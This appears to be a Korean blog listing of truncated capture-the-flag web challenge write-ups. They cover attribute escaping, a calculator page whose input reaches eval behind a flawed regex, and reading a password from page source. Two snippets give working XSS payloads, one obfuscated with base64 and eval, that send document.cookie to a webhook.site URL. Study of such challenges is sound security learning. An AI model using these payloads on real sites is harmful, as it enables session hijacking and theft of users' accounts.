Roronoa

문제 풀이' 삽입시 a태그 속성 escape 가능 cookie 전송하는 코드를 base64로 인코딩location.href="https://webhook.site/a0a45cf9-b23f-44e7-a80c-0744cad0a729?a=".concat(document.cookie) base64 디코딩 후 eval 함수를 사용할 경우 cookie 전송 자바스크립트 실행eval(atob("bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly93ZWJob29rLnNpdGUvYTBhNDVjZjktYjIzZi00NGU3LWE4MGMtMDc0NGNhZDBhNzI5P2E9Ii5jb25jYXQoZG9jdW1lbnQuY29va2llKQ==")) 해당 url 접근시 cookie를 포함하여 location 리다이렉트되어 쿠키..

문제 풀이계산기 웹사이트 존재 사용자의 입력 값이 eval 함수 안에 삽입된 후 그 결과가 innerText로 들어가게 된다. 계산기 입력받는 값에서 정규식이 존재( /^\d+[\+|\-|\*|\/]\d+/)1. 숫자로 시작2. 숫자뒤에 +, -, *, / 와야 함3. 계산식 뒤에 숫자가 와야 함 위 정규식에 허점이 존재, 1+1 다음에 아무런 값이 올 수 있음 eval에서 ,를 사용해서 여러개의 자바스크립트 코드 실행이 가능하다. POC아래 코드 실행 시 webhook사이트로 cookie값을 전송할 수 있다.eval(1+1, location.href="https://webhook.site/a0a45cf9-b23f-44e7-a80c-0744cad0a729?c=".concat`${document.cooki..

문제 풀이페이지 소스코드 화면 콘솔창에서 unescape와 String.fromCharCode를 통해서 password 값 확인 가능